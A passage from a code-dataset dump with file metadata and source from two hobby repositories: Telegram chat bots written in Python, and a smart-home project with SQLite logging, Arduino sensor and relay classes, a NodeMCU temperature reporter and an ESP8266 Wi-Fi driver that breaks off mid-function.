msg.message_id)\n\n\n# 信息json处理\[email protected]_handler(commands=['dump'])\ndef dump_msg(message):\n text = json.dumps(message.json, sort_keys=True, indent=4, ensure_ascii=False)\n new_msg = bot.send_message(message.chat.id, text)\n time.sleep(60)\n bot.delete_message(new_msg.chat.id, new_msg.message_id)\n\n\[email protected]_handler(commands=['post'])\ndef post_message(message):\n if message.chat.type == 'supergroup':\n if message.from_user.id == 'YOUR_TG_ID':\n if message.reply_to_message:\n msg = bot.send_message(message.chat.id, '正在发送投稿')\n bot.forward_message('YOUR_CHANNEL_ID', message.chat.id, message.reply_to_message.message_id)\n bot.edit_message_text('投稿成功', msg.chat.id, msg.message_id)\n time.sleep(30)\n bot.delete_message(msg.chat.id, msg.message_id)\n else:\n bot.send_message(message.chat.id, '请回复一个消息来投稿')\n else:\n bot.send_message(message.chat.id, '只有管理员可以用!再乱动我扁你')\n else:\n bot.send_message(message.chat.id, '请在群组里使用')\n\n\n# +--------------------------------------------------------------------------------------------+\n# 查询关键词是否在字典,查询字典key对应值是否为列表,是则返回随机语句,否则直接返回key对应语句\n# 语法糖中的lambda从导入的regexp模块中查询关键词存在与否,存在返回True,不存在返回False\n# +--------------------------------------------------------------------------------------------+\nre_mg = regexp_search.Msg()\n\n\[email protected]_handler(func=lambda message: re_mg.msg_match(message.text))\ndef reply_msg(message):\n msg_dic = re_mg.reply_msg_dic\n keyword = re_mg.keyword\n # 通过上面的keyword键从字典中读取值 \n reply_words = msg_dic[keyword] \n if type(reply_words) == list:\n num = random.randrange(len(reply_words))\n bot.send_chat_action(message.chat.id, 'typing')\n new_msg = bot.send_message(message.chat.id, reply_words[num])\n else:\n bot.send_chat_action(message.chat.id, 'typing')\n new_msg = bot.send_message(message.chat.id, reply_words)\n\n\nif __name__ == '__main__':\n # 轮询\n bot.polling()\n"
},
{
"alpha_fraction": 0.6384589076042175,
"alphanum_fraction": 0.6494668126106262,
"avg_line_length": 32.03409194946289,
"blob_id": "3bd7a377590f440b16a42170a922fd6dd185d610",
"content_id": "7b430d2aef43ff218d68118cf33c8421749c8cdc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3385,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 88,
"path": "/Bot2.py",
"repo_name": "TomHaridi/Avimitin_Bot",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# author: Avimitin\n# datetime: 2020/3/29 13:58\nimport telebot\nimport yaml\nimport json\nimport re\nimport logging\n\nlogger = telebot.logger\ntelebot.logger.setLevel(logging.DEBUG)\n\nwith open('config/config.yaml', 'r+', encoding='UTF-8') as token_file:\n bot_token = yaml.load(token_file, Loader=yaml.FullLoader)\nTOKEN = bot_token['TOKEN2']\nbot = telebot.TeleBot(TOKEN)\n\n\[email protected]_handler(commands=['start'])\ndef send_message(message):\n bot.send_message(message.chat.id, '直接发送消息即可转发')\n\n\[email protected]_handler(commands=['help'])\ndef send_message(message):\n bot.send_message(message.chat.id, '没有帮助菜单,我就是没有感情的转发机器')\n\n# 解除+86 spam 的教程\[email protected]_handler(commands=['despam'])\ndef send_message(message):\n bot.send_message(message.chat.id, 'https://t.me/YinxiangBiji_News/480', disable_web_page_preview=False)\n\n\[email protected]_handler(commands=['report'])\ndef report_bug(message):\n new_msg = bot.send_message(message.chat.id, '正在提交您的bug')\n\n try:\n if len(message.text) == 7:\n raise ValueError('wrong length')\n\n text = message.text[7:]\n # 这里是我的TG账号\n bot.send_message('649191333', '有人向你提交了一个bug:{}'.format(text))\n bot.edit_message_text('发送成功,感谢反馈', chat_id=new_msg.chat.id, message_id=new_msg.message_id)\n\n except ValueError:\n bot.send_message(message.chat.id, '请带上您的问题再report谢谢')\n\n\ndef msg_filter(sentence):\n if sentence[0] == '/':\n return False\n else:\n return True\n\n\[email protected]_handler(func=lambda message: msg_filter(str(message.text)))\ndef forward_all(message):\n '''\n 当机器人收到的消息来自sample时,则会读取sample所回复对话的房间号,并将sample\n 发的回复转发到消息来源处。假如消息来源于其他人,bot会把消息转发给sample。\n '''\n if message.from_user.username == 'sample':\n if message.reply_to_message:\n try:\n reply_msg = message.reply_to_message.text\n reply_chat_id = re.search(r'^(\\d+)$', reply_msg, re.M)[0]\n bot.send_message(reply_chat_id, message.text)\n bot.send_message(message.chat.id, '发送成功')\n except telebot.apihelper.ApiException:\n bot.send_message(message.chat.id, '该房间不存在!')\n else:\n msg_from_chat_id = message.chat.id\n msg_from_user = message.from_user.username\n # 填入自己的chat id\n bot.send_message('YOUR_CHAT_ID', '用户:@{} 从\\n房间={}\\n向您发来了一条消息:\\n{}'.format(msg_from_user,msg_from_chat_id,message.text))\n else:\n new_msg = bot.send_message(message.chat.id, '正在发送您的消息。\\n(请注意,只有提醒发送成功才真的发送了,假如消息多次发送失败使用 /report 发送bug,或者请联系管理员)')\n\n msg_from_chat_id = message.chat.id\n msg_from_user = message.from_user.username\n bot.send_message('YOUR_CHAT_ID', '用户:@{} 从房间\\n{}\\n向您发来了一条消息:\\n{}'.format(msg_from_user,msg_from_chat_id,message.text))\n \n bot.edit_message_text(text='发送成功', chat_id = new_msg.chat.id, message_id=new_msg.message_id)\n\n\nbot.polling()\n"
},
{
"alpha_fraction": 0.7290470600128174,
"alphanum_fraction": 0.7359356880187988,
"avg_line_length": 20.219512939453125,
"blob_id": "f9b38230642eee3f161001209cd9447ed7baa6dc",
"content_id": "9d1f000df6879c3309288aea6ae813de1a690a1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1481,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 41,
"path": "/README.md",
"repo_name": "TomHaridi/Avimitin_Bot",
"src_encoding": "UTF-8",
"text": "# Telegram机器人\n\n一时兴起用来辅助自己TG聊天用的一些bot,目前暂时开源部分功能。Bot使用到的库: [PyTelegramBotAPI](https://github.com/eternnoir/pyTelegramBotAPI)\n\n## @Avimitin_bot\n\n- 机器人地址:https://t.me/Avimitin_bot\n\n- 机器人目前所拥有的功能:回话和回复命令。\n- 机器人使用的依赖:`PyYaml`,`PyTelegramBotAPI`\n- 机器人的特性:不使用api的`regexp`功能回话,通过yaml文件的独特文件格式,实现自定义关键词回复的功能,从而减少代码行数,降低维护难度。并且支持单关键词多语句回复,实现随机回话的效果。\n\n- 使用方法:\n\n> 安装好python3.8,和上述依赖。\n>\n> 本地新建目录,使用`git clone https://github.com/Avimitin/Avimitin_Bot.git`命令下载源码。\n>\n> 编辑 config 目录中的`Reply.yaml`和`config.yaml`文件\n>\n> 在`config.yaml`里修改`TOKEN: 你的token`,保存退出\n>\n> 在`Reply.yaml`文件里按照以下格式添加关键词和回复:\n>\n> ```yaml\n> keywords: replywords\n> keywords2:\n> - replywords1\n> - replywords2\n> ```\n> \n> 最后添加代理执行`python Bot1.py`即可\n\n- 启动bot之后,可通过 `/add` 和 `/delete` 命令增删关键词和回复\n\n## @avimibot\n\n- 机器人地址: https://t.me/avimibot\n- 机器人目前功能:转发消息并回复,可用于客服或联系被Spam用户。\n- 机器人依赖:`PyTelegramBotAPI`\n- 机器人特性:普通的转发机器人。\n\n"
}
] | 3 |
MichaelLing83/pysmarthouse | https://github.com/MichaelLing83/pysmarthouse | 6e512aea8bf2b42fea4e418e7ab3e94d9bf70a1b | dd28f2ccffafc39f4ef519021cddc0da31819ba0 | 73898051c801bcaf999877a1b64bc5b589de7f5a | refs/heads/master | 2020-04-17T18:35:14.551209 | 2018-08-22T09:40:21 | 2018-08-22T09:40:21 | 32,323,535 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5821404457092285,
"alphanum_fraction": 0.5975914597511292,
"avg_line_length": 40.91428756713867,
"blob_id": "232d41a6dcefef669e8df7c9e0b8a82789bb73e4",
"content_id": "c630daa334b85fc0160d11c3d239889aa53951b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4401,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 105,
"path": "/WebInterface/python/db.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/bin/env python3\n'''\nDatabase table structure:\n id text, t text, v real, ts timestamp\n\n Example:\n \"Kitchen\", \"Temperature\", 25.67, \"2014-12-10 17:25:53.956548\"\n'''\nimport sqlite3\nimport datetime\nimport os.path\nimport logging\n\nPATH_TO_DB = \"/home/pi/git/pysmarthouse/WebInterface/data/pysmarthouse.db\"\nALL_IDS = (\"05\", \"KitchenWindow\", \"FrontDoorStep\", \"SunRoom\", \"GuestTiolet\", \"MainToilet\", \"Bedroom_1\", \"Bedroom_2\", \"Bedroom_3\")\nALL_TYPES = (\"Temperature\", \"Relay\")\n\nclass PSMError(Exception):\n pass\n\ndef check(p, t, r):\n '''\n Check a variable if they satisfy given condition.\n p: parameter to check\n t: parameter has to be of this type\n r: parameter has to be in this range\n E.g.\n check(5, int, (5,6))\n check(5, int, range(4,9))\n '''\n if not isinstance(t, type): raise PSMError(\"{0} is not a type!\".format(t))\n if not isinstance(p, t): raise PSMError(\"{0} is not of type {1}!\".format(p, t))\n if isinstance(r, range) or isinstance(r, tuple) or isinstance(r, list):\n if not p in r: raise PSMError(\"{0} is not in {1}!\".format(p, r))\n elif r == None:\n # skip checking values\n pass\n else:\n if not p == r: raise PSMError(\"{0} != {1}\".format(p, r))\n\nclass DB:\n @staticmethod\n def gen_new_db():\n global PATH_TO_DB\n try:\n logging.info(\"Trying to create DB at {}\".format(PATH_TO_DB))\n conn = sqlite3.connect(PATH_TO_DB, detect_types=sqlite3.PARSE_DECLTYPES|sqlite3.PARSE_COLNAMES)\n logging.info(\"DB created at {}\".format(PATH_TO_DB))\n except sqlite3.OperationalError as e:\n # path not found, possibly it's not running on the right Raspberry Pi\n # use PWD instead\n logging.warning(\"Path could not be found: {}\".format(PATH_TO_DB))\n PATH_TO_DB = \"./pysmarthouse.db\"\n logging.warning(\"Trying to create DB at {} instead.\".format(PATH_TO_DB))\n conn = sqlite3.connect(PATH_TO_DB, detect_types=sqlite3.PARSE_DECLTYPES|sqlite3.PARSE_COLNAMES)\n logging.warning(\"DB created at {}\".format(PATH_TO_DB))\n c = conn.cursor()\n c.execute(\"drop table if exists pysmarthouse\")\n logging.info(\"Table pysmarthouse is dropped should it exist.\")\n c.execute(\"create table pysmarthouse (id text, t text, v real, ts timestamp)\")\n logging.info(\"Table pysmarthouse created with (id text, t text, v real, ts timestamp).\")\n def __init__(self):\n logging.info(\"Initializing DB instance...\")\n if not os.path.isfile(PATH_TO_DB): DB.gen_new_db()\n self.conn = sqlite3.connect(PATH_TO_DB, detect_types=sqlite3.PARSE_DECLTYPES|sqlite3.PARSE_COLNAMES)\n self.c = self.conn.cursor()\n logging.info(\"Initializing DB instance done.\")\n def insert(self, id, t, v, ts=None):\n # check parameter\n if ts == None:\n ts = datetime.datetime.now()\n check(id, str, ALL_IDS)\n check(t, str, ALL_TYPES)\n check(v, float, None)\n check(ts, datetime.datetime, None)\n # insert into database\n self.c.execute(\"insert into pysmarthouse(id,t,v,ts) values (?,?,?,?)\", (id, t, v, ts))\n self.conn.commit()\n logging.info(\"Record with id={}, t={}, v={}, ts={} is inserted.\".format(id, t, v, ts))\n def get_records(self, half_delta=datetime.timedelta(hours=12), ts=None):\n '''\n Return all records among |now()-ts| < half_delta\n Result is sorted by timestamp.\n '''\n if ts == None:\n ts = datetime.datetime.now()\n logging.debug(\"half_delta={}, ts={}\".format(half_delta, ts))\n check(half_delta, datetime.timedelta, None)\n check(ts, datetime.datetime, None)\n result = list()\n self.c.execute(\"select id, t, v, ts from pysmarthouse order by ts\")\n record = self.c.fetchone()\n while record:\n if abs(record[-1] - ts) < half_delta: result.append(record)\n record = self.c.fetchone()\n logging.debug(\"Found records: {}\".format(result))\n return tuple(result)\n\nif __name__ == '__main__':\n PATH_TO_DB = \"./pysmarthouse.db\"\n db = DB()\n for i in range(10):\n db.insert(ALL_IDS[i % len(ALL_IDS)], ALL_TYPES[i % len(ALL_TYPES)], float(i*2))\n for id, t, v, ts in db.get_records():\n print(\"{:16s}{:16s}{:8.2f}\\t{:10s}\".format(id, t, v, str(ts)))\n"
},
{
"alpha_fraction": 0.5792349576950073,
"alphanum_fraction": 0.5892531871795654,
"avg_line_length": 27.153846740722656,
"blob_id": "87b32b01cf1daf373498254b444f7ab941838085",
"content_id": "44ec67bfa28302a597d842abfd46677b07739097",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1098,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 39,
"path": "/lib/UltraSoundDistanceMeas/UltraSoundDistanceMeas.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n\n#include \"UltraSoundDistanceMeas.h\"\n\n/****************************************************************************/\nunsigned long UltraSoundDistanceMeas::measure()\n{\n unsigned long round_trip_time = 0;\n unsigned long distance = 0;\n digitalWrite(trig_pin, LOW);\n digitalWrite(trig_pin, HIGH);\n delayMicroseconds(20);\n digitalWrite(trig_pin, LOW);\n round_trip_time = pulseIn(echo_pin, HIGH);\n if (round_trip_time !=0 )\n {\n distance = round_trip_time * (ULTRASOUND_SPEED >> 1 );\n }\n return distance;\n}\n\n/****************************************************************************/\nUltraSoundDistanceMeas::UltraSoundDistanceMeas(\n unsigned int _trig_pin, unsigned int _echo_pin):\n trig_pin(_trig_pin), echo_pin(_echo_pin)\n{\n}\n\nvoid UltraSoundDistanceMeas::init()\n{\n pinMode(trig_pin, OUTPUT);\n pinMode(echo_pin, INPUT);\n}\n"
},
{
"alpha_fraction": 0.43403884768486023,
"alphanum_fraction": 0.492026686668396,
"avg_line_length": 32.813724517822266,
"blob_id": "9e3f4679424ce88e3d241dadf2cbad263cedc2f7",
"content_id": "854d5b835b280b6c3cbfca658ad778eb401da0d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 3449,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 102,
"path": "/NodeMcu/init.lua",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "--init.lua\n\ndevide_id = \"05\"\nds18b20_pin = 3 -- GPIO0\npin = 4 -- GPIO1\now.setup(ds18b20_pin) -- init one wire\nwifi_ssid = \"michael\"\nwifi_passwd = \"waterpigs\"\nconfig_server_port = 5683\ndata_server_ip = \"192.168.31.185\"\ndata_server_port = 9999\ndata_report_timer = 60000 -- 60 seconds\n\n-- Bit xor operation\n--- TODO: is this not built in??\nfunction bxor(a,b)\n local r = 0\n for i = 0, 31 do\n if ( a % 2 + b % 2 == 1 ) then\n r = r + 2^i\n end\n a = a / 2\n b = b / 2\n end\n return r\nend\n\n-- Get temperature from DS18B20\n--- return: integer, unit is 1/10000 degree celcius; a value over 100 C should be treated as invalid\nfunction getTemp()\n local t = 101 * 10000 -- 101 degree Celcius, the invalid temperature\n addr = ow.reset_search(ds18b20_pin)\n repeat\n tmr.wdclr() -- clear system watchdog counter to avoid hardware reset caused by watchdog\n if (addr ~= nil) then\n crc = ow.crc8(string.sub(addr,1,7))\n if (crc == addr:byte(8)) then\n if ((addr:byte(1) == 0x10) or (addr:byte(1) == 0x28)) then\n ow.reset(ds18b20_pin)\n ow.select(ds18b20_pin, addr)\n ow.write(ds18b20_pin, 0x44, 1)\n tmr.delay(1000000)\n present = ow.reset(ds18b20_pin)\n ow.select(ds18b20_pin, addr)\n ow.write(ds18b20_pin,0xBE, 1)\n data = nil\n data = string.char(ow.read(ds18b20_pin))\n for i = 1, 8 do\n data = data .. string.char(ow.read(ds18b20_pin))\n end\n crc = ow.crc8(string.sub(data,1,8))\n if (crc == data:byte(9)) then\n t = (data:byte(1) + data:byte(2) * 256)\n if (t > 32768) then\n t = (bxor(t, 0xffff)) + 1\n t = (-1) * t\n end\n t = t * 625\n -- print(\"Last temp: \" .. t)\n end\n end\n end\n end\n addr = ow.search(ds18b20_pin)\n until(addr == nil)\n return t\nend\n\nwifi.setmode(wifi.STATION)\nwifi.sta.config(wifi_ssid, wifi_passwd)\nwifi.sta.connect()\n\ntmr.alarm(1, 1000, 1, function()\n if wifi.sta.getip()== nil then\n print(\"IP unavaiable, Waiting...\")\n else\n tmr.stop(1)\n print(\"Config done, IP is \"..wifi.sta.getip())\n print(\"start UDP server on port \"..config_server_port)\n s=net.createServer(net.UDP)\n s:on(\"receive\",function(s,c)\n --print(c)\n if c == \"high\" then\n print(\"turning GPIO2 high\")\n gpio.write(pin, gpio.HIGH)\n else\n print(\"turning GPIO2 low\")\n gpio.write(pin, gpio.LOW)\n end\n end)\n s:listen(config_server_port)\n client = net.createConnection(net.UDP, 0)\n client:connect(data_server_port, data_server_ip)\n tmr.alarm(2, data_report_timer, 1, function()\n cur_temp = getTemp()\n t1 = cur_temp / 10000\n t2 = (cur_temp >= 0 and cur_temp % 10000) or (10000 - cur_temp % 10000)\n print(\"Temp:\"..t1..\".\"..string.format(\"%04d\", t2)..\" C\\n\")\n client:send(\"REPORT;\"..devide_id..\";Temperature;\"..cur_temp)\n end)\n end\nend)\n"
},
{
"alpha_fraction": 0.5926412343978882,
"alphanum_fraction": 0.6136662364006042,
"avg_line_length": 16.697673797607422,
"blob_id": "926078d9dd5905e047d4d9ba8453e8dee304c7f0",
"content_id": "0aa2ed11d707aff49b28c6016cd9e94968736d82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 761,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 43,
"path": "/ArduinoController/Relay.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n\n/**\n * @file Relay.h\n *\n * Class providing handling of one relay\n VCC -> 5V\n GND -> GND\n IN -> PIN_x\n */\n\n#ifndef __RELAY_H__\n#define __RELAY_H__\n\n#include <Arduino.h>\n\nclass Relay\n{\nprivate:\n uint8_t _on_lvl;\n uint8_t _cur_lvl;\n uint8_t _pin;\n\npublic:\n\n Relay(uint8_t __pin, uint8_t __on_lvl);\n\n void begin(uint8_t default_lvl);\n void on(void);\n void off(void);\n uint8_t cur_lvl(void);\n void on_lvl(uint8_t __on_lvl);\n uint8_t on_lvl(void);\n uint8_t pin(void);\n};\n\n#endif // __RELAY_H__\n"
},
{
"alpha_fraction": 0.43455132842063904,
"alphanum_fraction": 0.4449445605278015,
"avg_line_length": 24.888771057128906,
"blob_id": "34499416ff95a1f560e32d7ff22b7b16cd359531",
"content_id": "2705a3806ba326ea8253fa06da5eebc6251bb139",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 24439,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 944,
"path": "/ArduinoController/uartWIFI.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\nDONE: Find a good way to wait for ESP8266_TIMEOUT. In current solution, if we are unlucky and there is a wrap-around of timer, the we could\n wait forever.\n Answer: this is not a problem, since when overflow happens, the subtraction result will be a really big number (thanks to unsigned)\nTODO: Find if head and tail pattern are universal, so we could handle them at one place.\n*/\n\n#include \"uartWIFI.h\"\n\n#ifdef ESP8266_DEBUG\n #define DBGR(message) Serial.print(message)\n #define DBG(message) Serial.println(message) // debug output with newline\n #define DBGW(message) Serial.write(message)\n#else\n #define DBGR(message)\n #define DBG(message)\n #define DBGW(message)\n#endif\n\n#ifdef ESP8266_DEBUG_2\n #define DBG2R(message) Serial.print(message)\n #define DBG2(message) Serial.println(message)\n#else\n #define DBG2R(message)\n #define DBG2(message)\n#endif\n\n#ifdef UNO\n #ifdef ESP8266_DEBUG\n SoftwareSerial softSerial(_DBG_RXPIN_, _DBG_TXPIN_);\n #endif\n#endif\n\nint chlID; //client id(0-4)\n\nvoid WIFI::begin(void)\n{\n #ifdef ESP8266_DEBUG\n DebugSerial.begin(debugBaudRate); //The default baud rate for debugging is 9600\n #endif\n DBG2(\"WIFI::begin() starts\");\n _newline = \"\\r\\n\";\n _cell.begin(ESP8266_BAUDRATE);\n _cell.flush();\n _cell.setTimeout(ESP8266_TIMEOUT);\n Reset(); // TODO: at other places, Reset results are not checked, is it a problem that Reset fails?\n DBG2(\"WIFI::begin() ends\");\n}\n\n\n/*************************************************************************\nInitialize port\n\n mode: setting operation mode\n STA: Station\n AP: Access Point\n AT_STA: Access Point & Station\n ssid: Wifi SSID (network name)\n pwd: Wifi password\n chl: channel number if AP or AP_STA\n ecn: encryption method if AP or AP_STA\n OPEN 0\n WEP 1\n WAP_PSK 2\n WAP2_PSK 3\n WAP_WAP2_PSK 4\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::Initialize(byte mode, String ssid, String pwd, byte chl, byte ecn)\n{\n DBG2R(\"WIFI::Initialize starts with \");\n DBG2R(\"mode=\");DBG2R(mode);DBG2R(\" SSID=\");DBG2R(ssid);DBG2R(\" pwd=\");DBG2R(pwd);DBG2R(\" chl=\");DBG2R(chl);DBG2R(\" ecn=\");DBG2(ecn);\n boolean result = false;\n if (mode == STA || mode == AP || mode == AP_STA) {\n result = confMode(mode);\n Reset();\n // TODO: if confMode fails, does it make sense to continue with confJAP and confSAP?\n switch (mode) {\n case STA:\n confJAP(ssid, pwd);\n break;\n case AP:\n confSAP(ssid, pwd, chl, ecn);\n break;\n case AP_STA:\n confJAP(ssid, pwd);\n confSAP(ssid, pwd, chl, ecn);\n break;\n default: break;\n }\n }\n return result;\n DBG2R(\"WIFI::Initialize ends with \");DBG2(result);\n}\n\n/*************************************************************************\nSet up TCP or UDP connection\n\n type: TCP or UDP\n\n addr: ip address\n\n port: port number\n\n useMultiConn: single / multiple connection\n false to use single connection\n true to use multiple connection\n\n id: id number(0-4)\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::ipConfig(byte type, String addr, int port, boolean useMultiConn, byte id)\n{\n DBG2R(\"WIFI::ipConfig starts with \");\n DBG2R(\"type=\");DBG2R(type);DBG2R(\" addr=\");DBG2R(addr);DBG2R(\" port=\");DBG2R(port);DBG2R(\" useMultiConn=\");DBG2R(useMultiConn);\n DBG2R(\" id=\");DBG2(id);\n boolean result = false;\n confMux(useMultiConn);\n delay(ESP8266_TIMEOUT); // TODO: is this necessary?\n if (!useMultiConn) { // use single connection mode\n result = newMux(type, addr, port);\n } else {\n result = newMux(id, type, addr, port);\n }\n DBG2R(\"WIFI::ipConfig ends with \");DBG2(result);\n return result;\n}\n\n/*************************************************************************\nReceive message from wifi\n\n buf: buffer for receiving data\n\n chlID: <id>(0-4)\n\n return: size of the buffer\n\nTODO: this method should take parameter like (unsigned char* buf, unsigned int max_length) so we could check the received data length does\n not exceeds the buffer length.\nTOCO: define a new struct as return type, which consists of iSize and chlID (which could be -1 to mark chlID doesn't exist).\n***************************************************************************/\nint WIFI::ReceiveMessage(char *buf)\n{\n //+IPD,<len>:<data>\n //+IPD,<id>,<len>:<data>\n String data;\n int iSize = 0;\n unsigned long start = millis();\n\n // read in all data, which ends with \"\\nOK\".\n while (millis() - start < ESP8266_TIMEOUT * 2) {\n while (_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"\\nOK\") != -1) {\n break;\n }\n }\n DBGR(\"data=\");DBG(data);\n\n // post processing\n // it can be in form \"+IPD,len:data\" or \"+IPD,id,len:data\"\n int head_start, head_end, id_start, len_start, data_start;\n String id, len;\n String head;\n head_start = data.indexOf('+');\n head_end = data.indexOf(':');\n if (head_start == -1 || head_end == -1 || head_start >= head_end) {\n DBG(\"No head\");\n return 0;\n }\n head = data.substring(head_start, head_end); // gives either \"+IPD,len\" or \"+IPD,id,len\"\n id_start = head.indexOf(',') + 1;\n len_start = head.lastIndexOf(',') + 1;\n if (id_start == -1 || len_start == -1) {\n DBG(\"No id or len\");\n return 0;\n } else if (id_start != len_start) {\n // it's \"+IPD,id,len\"\n id = head.substring(id_start, len_start-1);\n DBG(id);\n chlID = id.toInt();\n }\n len = head.substring(len_start);\n iSize = len.toInt();\n data = data.substring(head_end+1);\n if (iSize > data.length()) {\n DBG(\"Not fully received\");\n return 0;\n }\n // copy received bytes into given buffer\n data.toCharArray(buf, iSize);\n return iSize;\n}\n\n//////////////////////////////////////////////////////////////////////////\n\n\n/*************************************************************************\nReboot the wifi module\n\n\n\n***************************************************************************/\nboolean WIFI::Reset(void)\n{\n DBG(\"WIFI::Reset starts\");\n boolean result = false;\n unsigned long start;\n _cell.println(\"AT+RST\");\n DBG(\"AT+RST\");\n start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if (_cell.find(\"ready\")) {\n result = true;\n break;\n }\n }\n DBG(\"WIFI::Reset ends with \");\n DBG(result);\n return result;\n}\n\n/*********************************************\n *********************************************\n *********************************************\n WIFI Function Commands\n *********************************************\n *********************************************\n *********************************************\n */\n\n/*************************************************************************\nInquire the current mode of wifi module\n\n return: string of current mode\n Station\n AP\n AP+Station\n\n***************************************************************************/\nString WIFI::showMode()\n{\n String data;\n String result = \"Unknown\";\n _cell.println(\"AT+CWMODE?\");\n DBG(\"AT+CWMODE?\");\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"OK\") != -1) {\n break;\n }\n }\n DBG(data);\n if (data.indexOf(\"1\") != -1) {\n result = \"Station\";\n } else if (data.indexOf(\"2\") != -1) {\n result = \"AP\";\n } else if (data.indexOf(\"3\") != -1) {\n result = \"AP+Station\";\n }\n DBG(result);\n return result;\n}\n\n\n\n/*************************************************************************\nConfigure the operation mode\n\n mode:\n 1 - Station\n 2 - AP\n 3 - AP+Station\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::confMode(byte mode)\n{\n DBG(\"WIFI::confMode starts\");\n String data;\n boolean result;\n String cmd = \"AT+CWMODE=\";\n cmd += mode;\n _cell.println(cmd);\n DBG(cmd);\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if (_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"OK\") != -1 || data.indexOf(\"no change\") != -1) {\n DBG(\"OK or no change\");\n result = true;\n break;\n }\n if (data.indexOf(\"ERROR\") != -1 || data.indexOf(\"busy\") != -1) {\n DBG(\"ERROR or busy\");\n break;\n }\n }\n DBG(data);\n DBG(\"WIFI::confMode ends\");\n DBG(result);\n return result;\n}\n\n\n/*************************************************************************\nShow the list of wifi hotspot\n\n return: string of wifi information\n encryption,SSID,RSSI\n\n\n***************************************************************************/\nString WIFI::showAP(void)\n{\n String data;\n _cell.flush();\n _cell.print(\"AT+CWLAP\\r\\n\");\n DBG(\"AT+CWLAP\\r\\n\");\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"OK\") != -1 || data.indexOf(\"ERROR\") != -1 ) {\n break;\n }\n }\n DBG(data);\n if(data.indexOf(\"ERROR\") != -1) {\n return \"ERROR\";\n } else {\n data.replace(\"AT+CWLAP\",\"\");\n data.replace(\"OK\",\"\");\n data.replace(\"+CWLAP\",\"WIFI\");\n while (data.indexOf(_newline) != -1) {\n data.replace(_newline, \"\");\n }\n DBG(data);\n return data;\n }\n }\n\n\n/*************************************************************************\nShow the name of current wifi access port\n\n return: string of access port name\n AP: <SSID>\n\n***************************************************************************/\nString WIFI::showJAP(void)\n{\n _cell.flush();\n _cell.println(\"AT+CWJAP?\");\n DBG(\"AT+CWJAP?\");\n String data;\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"OK\") != -1 || data.indexOf(\"ERROR\") != -1 ) {\n break;\n }\n }\n DBG(data);\n data.replace(\"AT+CWJAP?\",\"\");\n data.replace(\"+CWJAP\",\"AP\");\n data.replace(\"OK\",\"\");\n while (data.indexOf(_newline) != -1) {\n data.replace(_newline, \"\");\n }\n DBG(data);\n return data;\n}\n\n\n/*************************************************************************\nConfigure the SSID and password of the access port\n\n return:\n true - successfully\n false - unsuccessfully\n\n\n***************************************************************************/\nboolean WIFI::confJAP(String ssid, String pwd)\n{\n DBG(\"WIFI::confJAP starts\");\n boolean result = false;\n String cmd = \"AT+CWJAP=\\\"\";\n cmd += ssid;\n cmd += \"\\\",\\\"\";\n cmd += pwd;\n cmd += \"\\\"\";\n _cell.println(cmd);\n DBG(cmd);\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.find(\"OK\")) {\n result = true;\n break;\n }\n }\n DBG(\"WIFI::confJAP ends\");\n DBG(result);\n return result;\n}\n/*************************************************************************\nQuite the access port\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::quitAP(void)\n{\n _cell.println(\"AT+CWQAP\");\n DBG(\"AT+CWQAP\");\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.find(\"OK\")) {\n return true;\n }\n }\n return false;\n}\n\n/*************************************************************************\nShow the parameter of SSID, password, channel, encryption in AP mode\n\n return:\n mySAP:<SSID>,<password>,<channel>,<encryption>\n\n***************************************************************************/\nString WIFI::showSAP()\n{\n 